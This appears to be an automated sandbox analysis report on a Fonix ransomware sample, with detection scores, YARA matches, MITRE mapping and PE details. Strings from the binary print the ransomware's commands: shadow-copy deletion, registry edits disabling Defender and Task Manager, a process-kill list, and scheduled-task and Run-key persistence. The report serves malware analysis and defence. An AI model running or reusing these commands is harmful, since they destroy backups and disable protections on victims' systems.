Loading ...

Play interactive tourEdit tour

Analysis Report fM498uO16Z

Overview

General Information

Sample Name:fM498uO16Z (renamed file extension from none to exe)
Analysis ID:338145
MD5:e7f086119362368528a160be01f194ad
SHA1:996b28ecb4019f0be9fb2400a040bb1ab422235f
SHA256:e3f297dcc0aac80152ba1af99a2c4c101a1ee88759900da7cdfcc9cb5955f06d

Most interesting Screenshot:

Detection

Fonix
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Fonix ransomware
Yara detected Ransomware_Generic
Deletes shadow drive data (may be related to ransomware)
May drop file containing decryption instructions (likely related to ransomware)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • fM498uO16Z.exe (PID: 1068 cmdline: 'C:\Users\user\Desktop\fM498uO16Z.exe' MD5: E7F086119362368528A160BE01F194AD)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
fM498uO16Z.exeJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
    fM498uO16Z.exeJoeSecurity_FonixYara detected Fonix ransomwareJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmpJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
        00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmpJoeSecurity_FonixYara detected Fonix ransomwareJoe Security
          00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmpJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
            00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmpJoeSecurity_FonixYara detected Fonix ransomwareJoe Security
              Process Memory Space: fM498uO16Z.exe PID: 1068JoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.fM498uO16Z.exe.1180000.0.unpackJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
                  0.2.fM498uO16Z.exe.1180000.0.unpackJoeSecurity_FonixYara detected Fonix ransomwareJoe Security
                    0.0.fM498uO16Z.exe.1180000.0.unpackJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
                      0.0.fM498uO16Z.exe.1180000.0.unpackJoeSecurity_FonixYara detected Fonix ransomwareJoe Security

                        Sigma Overview

                        No Sigma rule has matched

                        Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus / Scanner detection for submitted sampleShow sources
                        Source: fM498uO16Z.exeAvira: detected
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: fM498uO16Z.exeVirustotal: Detection: 56%Perma Link
                        Source: fM498uO16Z.exeMetadefender: Detection: 22%Perma Link
                        Source: fM498uO16Z.exeReversingLabs: Detection: 55%
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011D89D0 CryptReleaseContext,_Init_thread_footer,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011D8290 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011D8AC0 CryptGenRandom,CryptReleaseContext,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011D8400 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext,
                        Source: fM498uO16Z.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe
                        Source: fM498uO16Z.exeString found in binary or memory: https://code.jquery.com/jquery-latest.js
                        Source: fM498uO16Z.exeString found in binary or memory: https://uupload.ir/files/g510_windows_10.gif
                        Source: fM498uO16Z.exeString found in binary or memory: https://www.who.int

                        Spam, unwanted Advertisements and Ransom Demands:

                        barindex
                        Yara detected Fonix ransomwareShow sources
                        Source: Yara matchFile source: fM498uO16Z.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY
                        Source: Yara matchFile source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
                        Yara detected Ransomware_GenericShow sources
                        Source: Yara matchFile source: fM498uO16Z.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY
                        Source: Yara matchFile source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
                        Deletes shadow drive data (may be related to ransomware)Show sources
                        Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmpBinary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
                        Source: fM498uO16Z.exeBinary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
                        May drop file containing decryption instructions (likely related to ransomware)Show sources
                        Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmpBinary or memory string: How To Decrypt Files.hta\Help.txt
                        Source: fM498uO16Z.exeBinary or memory string: How To Decrypt Files.hta\Help.txt
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0122F14C
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011B31B0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0122F9E4
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_012289F8
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0121F880
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01229888
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0118E0E0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011B1B40
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0121F394
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0123A3FC
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0118CAD0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01186D20
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01195D40
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011D9590
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011813F0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0122DD94
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011B4DD0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01226400
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_012154A4
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01221CAC
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011884A0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01185CD0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01190F80
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01225784
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011B27D0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0121F618
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011B4650
                        Source: classification engineClassification label: mal84.rans.evad.winEXE@1/0@0/0
                        Source: fM498uO16Z.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: fM498uO16Z.exeVirustotal: Detection: 56%
                        Source: fM498uO16Z.exeMetadefender: Detection: 22%
                        Source: fM498uO16Z.exeReversingLabs: Detection: 55%
                        Source: fM498uO16Z.exeStatic file information: File size 1266688 > 1048576
                        Source: fM498uO16Z.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe
                        Source: fM498uO16Z.exeStatic PE information: section name: _RDATA
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01189877 push rbp; iretd
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011F10F0 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

                        Malware Analysis System Evasion:

                        barindex
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                        Source: fM498uO16Z.exeBinary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EXEWINWORD.EXEWORDPAD.EXENOTEPAD.EXEPAINT.EXENOTEPAD++.EXEENDNOTE.EXEVMWAREUSER.EXEVMWARESERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXESANDBOXIEDCOMLAUNCH.EXEPROCMON.EXEREGMON.EXEFILEMON.EXEWIRESHARK.EXENETMON.EXEVMTOOLSD.EXENTOSKRNL.EXESSMS.EXECBSERVICE.EXEHTTPD.EXEJUSCHED.EXEJUCHECK.EXEJAVAW.EXEJAVA.EXEIPTRAY.EXEIPERIUS.EXEFILEZILLA.EXEDATACOLLECTORSVC.EXEEDGETRANSPORT.EXESTORE.EXEACROTRAY.EXEAGENT.EXESAGECSCLIENT.EXEWSUSSERVICE.EXESLACK.EXENODE.EXEW3WP.EXEMYSQL.EXEMSMDSRV.EXEMSDTSSRVR.EXEFDLAUNCHER.EXEFDHOST.EXEREPORTINGS
                        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                        Source: fM498uO16Z.exeBinary or memory string: Output error ::::].FONIXzip filecopy to path \Cpub.keyreg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /freg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /freg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /Freg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /Fstart cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Qstart cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exitstart up attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /Fcopy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exeXINOF.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /Freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /fflag C:\ProgramData\nonsnonsFlagblack list mms.exeschedul2.exeschedhelp.exetib_mounter_monitor.exeSQLIOSIM.EXESqlagent.exesqlmaint.exesqlstubss.execsrss.exesqlceip.exemstsc.exetaskmgr.exesqlservr.exeQBIDPService.exesqlserver.exemsftesql.exesqlagent.exesqlbrowser.exesqlwriter.exeoracle.exeocssd.exedbsnmp.exesynctime.exemydesktopqos.exeagntsvc.exeisqlpplussvc.exeisqlpussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefoxconfig.exetbirdconfig.exeocomm.exemysqld.exemysqld-nt.exemysqld-opt.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exestream.exethebat.exethebat64.exeThunderbird.exevisio.exewinword.exewordpad.exenotepad.exepaint.exenotepad++.exeendnote.exevmwareuser.exevmwareservice.exevboxservice.exevboxtray.exeSandboxiedcomlaunch.exeprocmon.exeregmon.exefilemon.exewireshark.exenetmon.exevmtoolsd.exentoskrnl.exeSsms.execbService.exehttpd.exejusched.exejucheck.exejavaw.exejava.exeiptray.exeIperius.exeFileZilla.exeDataCollectorSvc.exeEdgeTransport.exestore.exeacrotray.exeagent.exeSageCSClient.exewsusservice.exeslack.exenode.exew3wp.exemysql.exemsmdsrv.exeMsDtsSrvr.exefdlauncher.exefdhost.exeReportingS
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011F20B8 GetLastError,IsDebuggerPresent,OutputDebugStringW,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011F20B8 GetLastError,IsDebuggerPresent,OutputDebugStringW,
                        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_012218C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011F2E0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: EnumSystemLocalesW,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: EnumSystemLocalesW,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: try_get_function,GetLocaleInfoW,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: EnumSystemLocalesW,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011F32D0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management InstrumentationApplication Shimming1Application Shimming1Obfuscated Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsFile Deletion1LSASS MemorySecurity Software Discovery121Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerSystem Information Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        fM498uO16Z.exe56%VirustotalBrowse
                        fM498uO16Z.exe25%MetadefenderBrowse
                        fM498uO16Z.exe55%ReversingLabsWin64.PUA.Wacapew
                        fM498uO16Z.exe100%AviraHEUR/AGEN.1138883

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        0.2.fM498uO16Z.exe.1180000.0.unpack100%AviraHEUR/AGEN.1138883Download File
                        0.0.fM498uO16Z.exe.1180000.0.unpack100%AviraHEUR/AGEN.1138883Download File

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://uupload.ir/files/g510_windows_10.giffM498uO16Z.exefalse
                          high
                          https://www.who.intfM498uO16Z.exefalse
                            high
                            https://code.jquery.com/jquery-latest.jsfM498uO16Z.exefalse
                              high

                              Contacted IPs

                              No contacted IP infos

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:338145
                              Start date:11.01.2021
                              Start time:17:59:14
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 5m 35s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:fM498uO16Z (renamed file extension from none to exe)
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:27
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal84.rans.evad.winEXE@1/0@0/0
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32+ executable (console) x86-64, for MS Windows
                              Entropy (8bit):6.351821525994632
                              TrID:
                              • Win64 Executable Console (202006/5) 92.65%
                              • Win64 Executable (generic) (12005/4) 5.51%
                              • Generic Win/DOS Executable (2004/3) 0.92%
                              • DOS Executable Generic (2002/1) 0.92%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:fM498uO16Z.exe
                              File size:1266688
                              MD5:e7f086119362368528a160be01f194ad
                              SHA1:996b28ecb4019f0be9fb2400a040bb1ab422235f
                              SHA256:e3f297dcc0aac80152ba1af99a2c4c101a1ee88759900da7cdfcc9cb5955f06d
                              SHA512:4b2210e835856c7f3cdd9f0dcd79d0621d4316a945d37cfc083e41ff65acc249f3ec96fa7cb6c40742635038e084ef1a5992be3d40dcef3a8ddbb1fdd3a3031f
                              SSDEEP:24576:t+ePQNk/3Ut+M2nQmlcuo63Zkuy7qrAOyM9ea:t+ePQ2U4MeQKcCWB7hONe
                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........}P^...^...^.......J.......S............?.._.......O.......T...............Q...^...........r.......\......._......._...^..._..

                              File Icon

                              Icon Hash:00828e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x472a74
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows cui
                              Image File Characteristics:EXECUTABLE_IMAGE
                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x5FF6EC6A [Thu Jan 7 11:11:38 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:72154c931598a7b1abbe684878c6b103

                              Entrypoint Preview

                              Instruction
                              dec eax
                              sub esp, 28h
                              call 00007F5608B11298h
                              dec eax
                              add esp, 28h
                              jmp 00007F5608B108B7h
                              int3
                              int3
                              dec eax
                              sub esp, 28h
                              dec ebp
                              mov eax, dword ptr [ecx+38h]
                              dec eax
                              mov ecx, edx
                              dec ecx
                              mov edx, ecx
                              call 00007F5608B10A52h
                              mov eax, 00000001h
                              dec eax
                              add esp, 28h
                              ret
                              int3
                              int3
                              int3
                              inc eax
                              push ebx
                              inc ebp
                              mov ebx, dword ptr [eax]
                              dec eax
                              mov ebx, edx
                              inc ecx
                              and ebx, FFFFFFF8h
                              dec esp
                              mov ecx, ecx
                              inc ecx
                              test byte ptr [eax], 00000004h
                              dec esp
                              mov edx, ecx
                              je 00007F5608B10A55h
                              inc ecx
                              mov eax, dword ptr [eax+08h]
                              dec ebp
                              arpl word ptr [eax+04h], dx
                              neg eax
                              dec esp
                              add edx, ecx
                              dec eax
                              arpl ax, cx
                              dec esp
                              and edx, ecx
                              dec ecx
                              arpl bx, ax
                              dec edx
                              mov edx, dword ptr [eax+edx]
                              dec eax
                              mov eax, dword ptr [ebx+10h]
                              mov ecx, dword ptr [eax+08h]
                              dec eax
                              mov eax, dword ptr [ebx+08h]
                              test byte ptr [ecx+eax+03h], 0000000Fh
                              je 00007F5608B10A4Dh
                              movzx eax, byte ptr [ecx+eax+03h]
                              and eax, FFFFFFF0h
                              dec esp
                              add ecx, eax
                              dec esp
                              xor ecx, edx
                              dec ecx
                              mov ecx, ecx
                              pop ebx
                              jmp 00007F5608B100F2h
                              int3
                              dec eax
                              mov eax, esp
                              dec eax
                              mov dword ptr [eax+08h], ebx
                              dec eax
                              mov dword ptr [eax+10h], ebp
                              dec eax
                              mov dword ptr [eax+18h], esi
                              dec eax
                              mov dword ptr [eax+20h], edi
                              inc ecx
                              push esi
                              dec eax
                              sub esp, 20h
                              dec ecx
                              mov ebx, dword ptr [ecx+38h]
                              dec eax
                              mov esi, edx
                              dec ebp
                              mov esi, eax
                              dec eax
                              mov ebp, ecx
                              dec ecx
                              mov edx, ecx
                              dec eax
                              mov ecx, esi
                              dec ecx
                              mov edi, ecx
                              dec esp
                              lea eax, dword ptr [ebx+04h]
                              call 00007F5608B109B1h

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x11f8080xa0.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1380000x1e0.rsrc
